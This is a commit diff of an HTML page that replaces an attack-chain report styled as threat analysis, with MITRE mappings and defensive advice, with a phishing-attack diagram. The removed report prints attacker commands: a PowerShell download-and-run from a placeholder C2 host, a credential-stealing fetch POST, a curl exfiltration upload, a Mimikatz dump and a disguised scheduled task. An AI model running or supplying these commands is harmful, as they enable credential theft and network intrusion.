capta1n commited on
Commit
ddbe11e
·
verified ·
1 Parent(s): 22306da

Add 1 files

  1. index.html +529 -421
index.html CHANGED
@@ -3,476 +3,584 @@
3
  <head>
4
  <meta charset="UTF-8">
5
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
- <title>Advanced Phishing & Lateral Movement Attack Report</title>
7
  <script src="https://cdn.tailwindcss.com"></script>
8
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
  <style>
10
- .timeline-item:not(:last-child)::after {
11
- content: '';
12
  position: absolute;
13
- left: 24px;
14
- top: 32px;
15
- height: calc(100% - 32px);
16
- width: 2px;
17
  background-color: #e5e7eb;
 
18
  }
19
- .attack-step {
20
  transition: all 0.3s ease;
 
21
  }
22
- .attack-step:hover {
23
- transform: translateY(-2px);
24
  box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
25
  }
26
- .code-block {
27
- font-family: 'Courier New', monospace;
28
- background-color: #f8f9fa;
29
- border-left: 3px solid #3b82f6;
30
- padding: 0.75rem;
31
- overflow-x: auto;
32
  }
33
- .mitre-tag {
34
- display: inline-flex;
35
- align-items: center;
36
- padding: 0.25rem 0.5rem;
37
- border-radius: 9999px;
38
- font-size: 0.75rem;
39
- font-weight: 600;
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
40
  }
41
  </style>
42
  </head>
43
- <body class="bg-gray-50">
44
- <div class="container mx-auto px-4 py-8 max-w-5xl">
45
- <!-- Header -->
46
- <div class="flex flex-col md:flex-row justify-between items-start md:items-center mb-8">
47
- <div>
48
- <h1 class="text-3xl font-bold text-gray-800">Advanced Phishing & Lateral Movement Attack Report</h1>
49
- <p class="text-gray-600 mt-2">Detailed analysis of a sophisticated attack chain targeting internal credentials</p>
 
 
 
50
  </div>
51
- <div class="mt-4 md:mt-0 bg-white p-3 rounded-lg shadow-sm border border-gray-200">
52
- <div class="flex items-center">
53
- <div class="bg-red-100 p-2 rounded-full mr-3">
54
- <i class="fas fa-shield-alt text-red-500"></i>
55
- </div>
56
- <div>
57
- <p class="text-xs text-gray-500">Threat Level</p>
58
- <p class="font-semibold text-red-600">Critical</p>
59
- </div>
60
- </div>
61
  </div>
62
- </div>
63
-
64
- <!-- Executive Summary -->
65
- <div class="bg-white p-6 rounded-lg shadow-sm border border-gray-200 mb-8">
66
- <h2 class="text-2xl font-bold text-gray-800 mb-4">Executive Summary</h2>
67
- <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mb-4">
68
- <div class="bg-blue-50 p-4 rounded-lg">
69
- <h3 class="font-semibold text-gray-800 mb-2">Attack Vector</h3>
70
- <p class="text-sm text-gray-600">Spear phishing with malicious documents/links</p>
71
- </div>
72
- <div class="bg-purple-50 p-4 rounded-lg">
73
- <h3 class="font-semibold text-gray-800 mb-2">Primary Target</h3>
74
- <p class="text-sm text-gray-600">Internal SSH credentials & sensitive documents</p>
75
- </div>
76
- <div class="bg-red-50 p-4 rounded-lg">
77
- <h3 class="font-semibold text-gray-800 mb-2">Impact</h3>
78
- <p class="text-sm text-gray-600">Full internal network compromise possible</p>
79
- </div>
80
  </div>
81
- <p class="text-gray-700">
82
- This report details a sophisticated attack chain beginning with carefully crafted phishing emails, leading to C2 implantation, credential theft, and lateral movement through internal networks. The attacker demonstrates advanced techniques including domain spoofing, malicious macros, C2 infrastructure obfuscation, and browser session hijacking.
83
- </p>
84
  </div>
85
-
86
- <!-- Timeline -->
87
- <div class="relative">
88
- <!-- Phase 1: Initial Compromise -->
89
- <div class="relative timeline-item pl-16 pb-8">
90
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
91
- 1
92
- </div>
93
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
94
- <div class="flex justify-between items-start">
95
- <div>
96
- <h3 class="font-bold text-lg text-gray-800">Initial Compromise</h3>
97
- <p class="text-gray-600 mt-1">Spear Phishing Campaign</p>
98
- </div>
99
- <span class="mitre-tag bg-blue-100 text-blue-800">
100
- <i class="fas fa-envelope mr-1"></i> T1566.001
101
- </span>
102
- </div>
103
- <div class="mt-4">
104
- <div class="flex items-start">
105
- <div class="bg-gray-100 p-2 rounded-full mr-3 mt-1">
106
- <i class="fas fa-user-secret text-gray-600"></i>
107
- </div>
108
- <div>
109
- <h4 class="font-medium text-gray-700">Attack Details</h4>
110
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
111
- <li>Email subjects: "紧急通知:阿里云账号异常登录提醒" or "内部会议纪要(机密)"</li>
112
- <li>Body mimics official Alibaba Cloud communications</li>
113
- <li>Contains either malicious attachment or phishing link</li>
114
- </ul>
115
-
116
- <h4 class="font-medium text-gray-700 mt-3">Technical Indicators</h4>
117
- <div class="code-block mt-2">
118
- <p>Attachment: 阿里云安全报告_v2023.pdf (malicious macro)</p>
119
- <p>Phishing URL: https://aliyun-support[.]com/verify</p>
120
- <p>Spoofed sender: security@alibaba-inc.com</p>
121
- <p>Typosquatting domain: al1baba-inc[.]com</p>
122
- </div>
123
- </div>
124
- </div>
125
- </div>
126
- </div>
127
  </div>
128
-
129
- <!-- Phase 2: Execution -->
130
- <div class="relative timeline-item pl-16 pb-8">
131
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
132
- 2
133
- </div>
134
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
135
- <div class="flex justify-between items-start">
136
- <div>
137
- <h3 class="font-bold text-lg text-gray-800">Execution</h3>
138
- <p class="text-gray-600 mt-1">Malicious Payload Delivery</p>
139
- </div>
140
- <span class="mitre-tag bg-purple-100 text-purple-800">
141
- <i class="fas fa-code mr-1"></i> T1059.001
142
- </span>
143
- </div>
144
- <div class="mt-4">
145
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
146
- <div>
147
- <h4 class="font-medium text-gray-700">Malicious Document</h4>
148
- <div class="code-block mt-2">
149
- <p>Macro code:</p>
150
- <p>powershell IEX (New-Object Net.WebClient).DownloadString('http://C2-SERVER/payload.ps1')</p>
151
- </div>
152
- <p class="text-sm text-gray-600 mt-2">Downloads and executes Cobalt Strike payload</p>
153
- </div>
154
- <div>
155
- <h4 class="font-medium text-gray-700">Phishing Site</h4>
156
- <div class="code-block mt-2">
157
- <p>JavaScript credential theft:</p>
158
- <p>fetch('http://C2-SERVER/steal', {</p>
159
- <p> method: 'POST',</p>
160
- <p> body: JSON.stringify({user: username, pass: password})</p>
161
- <p>});</p>
162
- </div>
163
- <p class="text-sm text-gray-600 mt-2">Perfect replica of Alibaba Cloud login</p>
164
- </div>
165
- </div>
166
- </div>
167
  </div>
 
 
168
  </div>
169
-
170
- <!-- Phase 3: Persistence -->
171
- <div class="relative timeline-item pl-16 pb-8">
172
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
173
- 3
174
- </div>
175
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
176
- <div class="flex justify-between items-start">
177
- <div>
178
- <h3 class="font-bold text-lg text-gray-800">Persistence</h3>
179
- <p class="text-gray-600 mt-1">C2 Infrastructure Establishment</p>
180
- </div>
181
- <span class="mitre-tag bg-red-100 text-red-800">
182
- <i class="fas fa-server mr-1"></i> T1572
183
- </span>
184
- </div>
185
- <div class="mt-4">
186
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
187
- <div>
188
- <h4 class="font-medium text-gray-700">C2 Configuration</h4>
189
- <div class="code-block mt-2">
190
- <p>Cobalt Strike listener:</p>
191
- <p>windows/x64/reflective PE</p>
192
- <p>HTTPS with valid certificate</p>
193
- <p>Multiple IP rotation via CDN</p>
194
- </div>
195
- </div>
196
- <div>
197
- <h4 class="font-medium text-gray-700">Persistence Methods</h4>
198
- <div class="code-block mt-2">
199
- <p>Registry:</p>
200
- <p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</p>
201
- <p>Task Scheduler:</p>
202
- <p>schtasks /create /tn "Windows Update" /tr "C:\Windows\System32\malicious.exe"</p>
203
- </div>
204
- </div>
205
- </div>
206
- </div>
207
  </div>
 
 
208
  </div>
209
-
210
- <!-- Phase 4: Credential Access -->
211
- <div class="relative timeline-item pl-16 pb-8">
212
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
213
- 4
214
- </div>
215
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
216
- <div class="flex justify-between items-start">
217
- <div>
218
- <h3 class="font-bold text-lg text-gray-800">Credential Access</h3>
219
- <p class="text-gray-600 mt-1">SSH & Browser Credential Theft</p>
220
- </div>
221
- <span class="mitre-tag bg-yellow-100 text-yellow-800">
222
- <i class="fas fa-key mr-1"></i> T1555
223
- </span>
224
- </div>
225
- <div class="mt-4">
226
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
227
- <div>
228
- <h4 class="font-medium text-gray-700">Credential Harvesting</h4>
229
- <div class="code-block mt-2">
230
- <p>Browser cookies:</p>
231
- <p>Mimikatz !sekurlsa::logonpasswords</p>
232
- <p>SSH keys:</p>
233
- <p>search C:\Users\*\.ssh\id_rsa</p>
234
- </div>
235
- </div>
236
- <div>
237
- <h4 class="font-medium text-gray-700">Credential Storage</h4>
238
- <div class="code-block mt-2">
239
- <p>Windows Credential Manager:</p>
240
- <p>cmdkey /list</p>
241
- <p>SSH config files:</p>
242
- <p>C:\Users\*\.ssh\config</p>
243
- </div>
244
- </div>
245
- </div>
246
- </div>
247
  </div>
 
 
248
  </div>
249
-
250
- <!-- Phase 5: Lateral Movement -->
251
- <div class="relative timeline-item pl-16 pb-8">
252
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
253
- 5
254
  </div>
255
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
256
- <div class="flex justify-between items-start">
257
- <div>
258
- <h3 class="font-bold text-lg text-gray-800">Lateral Movement</h3>
259
- <p class="text-gray-600 mt-1">Internal Network Penetration</p>
260
- </div>
261
- <span class="mitre-tag bg-orange-100 text-orange-800">
262
- <i class="fas fa-arrows-alt-h mr-1"></i> T1021
263
- </span>
264
- </div>
265
- <div class="mt-4">
266
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
267
- <div>
268
- <h4 class="font-medium text-gray-700">SSH Access</h4>
269
- <div class="code-block mt-2">
270
- <p>ssh -i id_rsa user@10.0.0.5</p>
271
- <p>plink.exe -ssh -P 22 -i id_rsa user@10.0.0.6</p>
272
- </div>
273
- <p class="text-sm text-gray-600 mt-2">Using stolen credentials for access</p>
274
- </div>
275
- <div>
276
- <h4 class="font-medium text-gray-700">Internal Recon</h4>
277
- <div class="code-block mt-2">
278
- <p>nmap -sS 10.0.0.0/24</p>
279
- <p>for ip in {1..254}; do ssh -o ConnectTimeout=1 user@10.0.0.$ip; done</p>
280
- </div>
281
- <p class="text-sm text-gray-600 mt-2">Scanning for additional targets</p>
282
- </div>
283
- </div>
284
- </div>
285
  </div>
 
 
286
  </div>
287
-
288
- <!-- Phase 6: Exfiltration -->
289
- <div class="relative timeline-item pl-16">
290
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
291
- 6
292
  </div>
293
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
294
- <div class="flex justify-between items-start">
295
- <div>
296
- <h3 class="font-bold text-lg text-gray-800">Exfiltration</h3>
297
- <p class="text-gray-600 mt-1">Data Collection & Exfiltration</p>
298
- </div>
299
- <span class="mitre-tag bg-green-100 text-green-800">
300
- <i class="fas fa-cloud-download-alt mr-1"></i> T1041
301
- </span>
302
- </div>
303
- <div class="mt-4">
304
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
305
- <div>
306
- <h4 class="font-medium text-gray-700">Browser Proxy</h4>
307
- <div class="code-block mt-2">
308
- <p>proxychains4 -q -f /path/to/config.txt firefox</p>
309
- <p>Proxy config: 1.2.3.4:8080</p>
310
- </div>
311
- <p class="text-sm text-gray-600 mt-2">MITM for internal application access</p>
312
- </div>
313
- <div>
314
- <h4 class="font-medium text-gray-700">Data Theft</h4>
315
- <div class="code-block mt-2">
316
- <p>Target files:</p>
317
- <p>*.pem, *.key, *.sql, *.db</p>
318
- <p>Exfiltration:</p>
319
- <p>split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload</p>
320
- </div>
321
- </div>
322
- </div>
323
- </div>
324
  </div>
 
 
325
  </div>
326
- </div>
327
-
328
- <!-- MITRE ATT&CK Mapping -->
329
- <div class="mt-12 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
330
- <h2 class="text-2xl font-bold text-gray-800 mb-4">MITRE ATT&CK Mapping</h2>
331
 
332
- <div class="overflow-x-auto">
333
- <table class="min-w-full divide-y divide-gray-200">
334
- <thead class="bg-gray-50">
335
- <tr>
336
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Tactic</th>
337
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Technique</th>
338
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">ID</th>
339
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Description</th>
340
- </tr>
341
- </thead>
342
- <tbody class="bg-white divide-y divide-gray-200">
343
- <tr>
344
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Initial Access</td>
345
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Spearphishing Attachment</td>
346
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1566.001</td>
347
- <td class="px-6 py-4 text-sm text-gray-500">Malicious documents sent via email</td>
348
- </tr>
349
- <tr>
350
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Execution</td>
351
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">PowerShell</td>
352
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1059.001</td>
353
- <td class="px-6 py-4 text-sm text-gray-500">Macro executes PowerShell payload</td>
354
- </tr>
355
- <tr>
356
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Persistence</td>
357
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Registry Run Keys</td>
358
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1547.001</td>
359
- <td class="px-6 py-4 text-sm text-gray-500">Adds malicious executable to startup</td>
360
- </tr>
361
- <tr>
362
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Credential Access</td>
363
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Credentials from Password Stores</td>
364
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1555</td>
365
- <td class="px-6 py-4 text-sm text-gray-500">Harvests SSH keys and browser cookies</td>
366
- </tr>
367
- <tr>
368
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Lateral Movement</td>
369
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Remote Services: SSH</td>
370
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1021.004</td>
371
- <td class="px-6 py-4 text-sm text-gray-500">Uses stolen SSH keys for access</td>
372
- </tr>
373
- <tr>
374
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Exfiltration</td>
375
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Exfiltration Over C2 Channel</td>
376
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1041</td>
377
- <td class="px-6 py-4 text-sm text-gray-500">Data sent through established C2</td>
378
- </tr>
379
- </tbody>
380
- </table>
381
  </div>
382
- </div>
383
-
384
- <!-- Recommendations -->
385
- <div class="mt-8 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
386
- <h2 class="text-2xl font-bold text-gray-800 mb-4">Defensive Recommendations</h2>
387
 
388
- <div class="space-y-4">
389
- <div class="flex items-start">
390
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
391
- 1
392
- </div>
393
- <div>
394
- <h3 class="font-medium text-gray-800">Enhanced Email Security</h3>
395
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
396
- <li>Implement DMARC/DKIM/SPF to prevent sender spoofing</li>
397
- <li>Deploy advanced attachment sandboxing for macro analysis</li>
398
- <li>User training on identifying typosquatting domains</li>
399
- </ul>
400
- </div>
401
  </div>
402
-
403
- <div class="flex items-start">
404
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
405
- 2
406
- </div>
407
- <div>
408
- <h3 class="font-medium text-gray-800">Endpoint Protection</h3>
409
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
410
- <li>Block Office macros from the internet zone</li>
411
- <li>Monitor for suspicious PowerShell execution patterns</li>
412
- <li>Implement application whitelisting for executables</li>
413
- </ul>
414
- </div>
 
 
 
 
 
 
 
415
  </div>
416
-
417
- <div class="flex items-start">
418
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
419
- 3
420
- </div>
421
- <div>
422
- <h3 class="font-medium text-gray-800">Credential Protection</h3>
423
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
424
- <li>Enforce MFA for all SSH access</li>
425
- <li>Regular rotation of SSH keys with automated monitoring</li>
426
- <li>Credential guard for browser session protection</li>
 
 
 
 
 
 
 
427
  </ul>
428
  </div>
429
  </div>
430
-
431
- <div class="flex items-start">
432
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
433
- 4
434
- </div>
435
- <div>
436
- <h3 class="font-medium text-gray-800">Network Monitoring</h3>
437
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
438
- <li>Detect unusual SSH login patterns (time/location)</li>
439
- <li>Monitor for internal systems communicating with external IPs</li>
440
- <li>Implement network segmentation for critical assets</li>
441
- </ul>
442
  </div>
443
  </div>
444
  </div>
445
  </div>
446
  </div>
447
 
448
- <footer class="bg-gray-100 border-t border-gray-200 py-6 mt-12">
449
- <div class="container mx-auto px-4 text-center text-gray-500 text-sm">
450
- <p>Advanced Phishing & Lateral Movement Attack Report | Generated on <span id="current-date"></span></p>
451
- <p class="mt-1">Confidential - For authorized personnel only</p>
452
- </div>
453
- </footer>
454
-
455
  <script>
456
- // Set current date
457
- const now = new Date();
458
- const options = { year: 'numeric', month: 'long', day: 'numeric', hour: '2-digit', minute: '2-digit' };
459
- document.getElementById('current-date').textContent = now.toLocaleDateString('en-US', options);
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
460
 
461
- // Add animation to attack steps
462
- const observer = new IntersectionObserver((entries) => {
463
- entries.forEach(entry => {
464
- if (entry.isIntersecting) {
465
- entry.target.style.opacity = '1';
466
- entry.target.style.transform = 'translateY(0)';
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
467
  }
468
  });
469
- }, { threshold: 0.1 });
470
-
471
- document.querySelectorAll('.attack-step').forEach(step => {
472
- step.style.opacity = '0';
473
- step.style.transform = 'translateY(20px)';
474
- step.style.transition = 'all 0.4s ease-out';
475
- observer.observe(step);
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
476
  });
477
  </script>
478
  <p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - 🧬 <a href="https://enzostvs-deepsite.hf.space?remix=capta1n/bas" style="color: #fff;text-decoration: underline;" target="_blank" >Remix</a></p></body>
 
3
  <head>
4
  <meta charset="UTF-8">
5
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Advanced Phishing Attack Sandbox Visualization</title>
7
  <script src="https://cdn.tailwindcss.com"></script>
8
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
  <style>
10
+ .network-line {
 
11
  position: absolute;
 
 
 
 
12
  background-color: #e5e7eb;
13
+ z-index: 0;
14
  }
15
+ .attack-node {
16
  transition: all 0.3s ease;
17
+ z-index: 1;
18
  }
19
+ .attack-node:hover {
20
+ transform: scale(1.05);
21
  box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
22
  }
23
+ .malicious {
24
+ border: 2px solid #ef4444;
 
 
 
 
25
  }
26
+ .compromised {
27
+ border: 2px solid #f59e0b;
28
+ }
29
+ .critical {
30
+ border: 2px solid #ef4444;
31
+ }
32
+ .data-flow {
33
+ stroke-dasharray: 5;
34
+ animation: dash 30s linear infinite;
35
+ }
36
+ @keyframes dash {
37
+ to {
38
+ stroke-dashoffset: -1000;
39
+ }
40
+ }
41
+ .tooltip {
42
+ position: absolute;
43
+ padding: 8px;
44
+ background: rgba(0, 0, 0, 0.8);
45
+ color: white;
46
+ border-radius: 4px;
47
+ pointer-events: none;
48
+ font-size: 12px;
49
+ z-index: 100;
50
+ max-width: 300px;
51
  }
52
  </style>
53
  </head>
54
+ <body class="bg-gray-100">
55
+ <div class="container mx-auto px-4 py-8">
56
+ <h1 class="text-3xl font-bold text-center text-gray-800 mb-2">Advanced Phishing Attack Sandbox</h1>
57
+ <p class="text-center text-gray-600 mb-8">Visualization of the complete attack kill chain from initial compromise to data exfiltration</p>
58
+
59
+ <!-- Attack Legend -->
60
+ <div class="bg-white rounded-lg shadow-md p-4 mb-8 grid grid-cols-1 md:grid-cols-4 gap-4">
61
+ <div class="flex items-center">
62
+ <div class="w-4 h-4 rounded-full bg-red-500 mr-2"></div>
63
+ <span class="text-sm">Attacker Infrastructure</span>
64
  </div>
65
+ <div class="flex items-center">
66
+ <div class="w-4 h-4 rounded-full bg-blue-500 mr-2"></div>
67
+ <span class="text-sm">Victim Assets</span>
 
 
 
 
 
 
 
68
  </div>
69
+ <div class="flex items-center">
70
+ <div class="w-4 h-4 rounded-full bg-yellow-500 mr-2"></div>
71
+ <span class="text-sm">Compromised Systems</span>
72
+ </div>
73
+ <div class="flex items-center">
74
+ <div class="w-4 h-4 rounded-full bg-green-500 mr-2"></div>
75
+ <span class="text-sm">Data Exfiltration</span>
 
 
 
 
 
 
 
 
 
 
 
76
  </div>
 
 
 
77
  </div>
78
+
79
+ <!-- Sandbox Visualization -->
80
+ <div class="relative bg-white rounded-xl shadow-lg p-6 h-[600px] overflow-hidden border border-gray-200">
81
+ <!-- Background Network Lines -->
82
+ <div class="absolute inset-0 opacity-20">
83
+ <div class="absolute left-1/4 top-0 bottom-0 w-px bg-gray-300"></div>
84
+ <div class="absolute left-2/4 top-0 bottom-0 w-px bg-gray-300"></div>
85
+ <div class="absolute left-3/4 top-0 bottom-0 w-px bg-gray-300"></div>
86
+ <div class="absolute top-1/3 left-0 right-0 h-px bg-gray-300"></div>
87
+ <div class="absolute top-2/3 left-0 right-0 h-px bg-gray-300"></div>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
88
  </div>
89
+
90
+ <!-- Attacker Infrastructure -->
91
+ <div id="attacker" class="attack-node absolute left-[10%] top-[15%] bg-red-50 p-4 rounded-lg shadow-sm border-2 border-red-300 w-[160px] text-center">
92
+ <div class="bg-red-100 p-3 rounded-full inline-block mb-2">
93
+ <i class="fas fa-user-secret text-red-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
94
  </div>
95
+ <h3 class="font-bold text-red-800">Attacker</h3>
96
+ <p class="text-xs text-red-600 mt-1">C2: 185.143.223.47</p>
97
  </div>
98
+
99
+ <!-- Phishing Server -->
100
+ <div id="phishing" class="attack-node absolute left-[10%] top-[40%] bg-red-50 p-4 rounded-lg shadow-sm border-2 border-red-300 w-[160px] text-center">
101
+ <div class="bg-red-100 p-3 rounded-full inline-block mb-2">
102
+ <i class="fas fa-server text-red-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
103
  </div>
104
+ <h3 class="font-bold text-red-800">Phishing Server</h3>
105
+ <p class="text-xs text-red-600 mt-1">aliyun-support[.]com</p>
106
  </div>
107
+
108
+ <!-- Malicious Document -->
109
+ <div id="document" class="attack-node absolute left-[10%] top-[65%] bg-red-50 p-4 rounded-lg shadow-sm border-2 border-red-300 w-[160px] text-center">
110
+ <div class="bg-red-100 p-3 rounded-full inline-block mb-2">
111
+ <i class="fas fa-file-word text-red-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
112
  </div>
113
+ <h3 class="font-bold text-red-800">Malicious Doc</h3>
114
+ <p class="text-xs text-red-600 mt-1">阿里云安全报告_v2023.pdf</p>
115
  </div>
116
+
117
+ <!-- Victim -->
118
+ <div id="victim" class="attack-node absolute left-[35%] top-[40%] bg-blue-50 p-4 rounded-lg shadow-sm border-2 border-blue-300 w-[160px] text-center">
119
+ <div class="bg-blue-100 p-3 rounded-full inline-block mb-2">
120
+ <i class="fas fa-user text-blue-600 text-xl"></i>
121
  </div>
122
+ <h3 class="font-bold text-blue-800">Employee</h3>
123
+ <p class="text-xs text-blue-600 mt-1">user@company.com</p>
124
+ </div>
125
+
126
+ <!-- Compromised Workstation -->
127
+ <div id="workstation" class="attack-node absolute left-[60%] top-[40%] bg-yellow-50 p-4 rounded-lg shadow-sm border-2 border-yellow-300 w-[160px] text-center compromised">
128
+ <div class="bg-yellow-100 p-3 rounded-full inline-block mb-2">
129
+ <i class="fas fa-laptop-code text-yellow-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
130
  </div>
131
+ <h3 class="font-bold text-yellow-800">Workstation</h3>
132
+ <p class="text-xs text-yellow-600 mt-1">Cobalt Strike Beacon</p>
133
  </div>
134
+
135
+ <!-- Internal SSH Server -->
136
+ <div id="ssh-server" class="attack-node absolute left-[60%] top-[15%] bg-blue-50 p-4 rounded-lg shadow-sm border-2 border-blue-300 w-[160px] text-center">
137
+ <div class="bg-blue-100 p-3 rounded-full inline-block mb-2">
138
+ <i class="fas fa-shield-alt text-blue-600 text-xl"></i>
139
  </div>
140
+ <h3 class="font-bold text-blue-800">SSH Server</h3>
141
+ <p class="text-xs text-blue-600 mt-1">10.0.0.5</p>
142
+ </div>
143
+
144
+ <!-- Compromised SSH Server -->
145
+ <div id="compromised-ssh" class="attack-node absolute left-[60%] top-[15%] bg-yellow-50 p-4 rounded-lg shadow-sm border-2 border-yellow-300 w-[160px] text-center compromised hidden">
146
+ <div class="bg-yellow-100 p-3 rounded-full inline-block mb-2">
147
+ <i class="fas fa-shield-alt text-yellow-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
148
  </div>
149
+ <h3 class="font-bold text-yellow-800">SSH Server</h3>
150
+ <p class="text-xs text-yellow-600 mt-1">10.0.0.5 (Compromised)</p>
151
  </div>
 
 
 
 
 
152
 
153
+ <!-- Internal Database -->
154
+ <div id="database" class="attack-node absolute left-[85%] top-[40%] bg-blue-50 p-4 rounded-lg shadow-sm border-2 border-blue-300 w-[160px] text-center">
155
+ <div class="bg-blue-100 p-3 rounded-full inline-block mb-2">
156
+ <i class="fas fa-database text-blue-600 text-xl"></i>
157
+ </div>
158
+ <h3 class="font-bold text-blue-800">Database</h3>
159
+ <p class="text-xs text-blue-600 mt-1">10.0.1.10</p>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
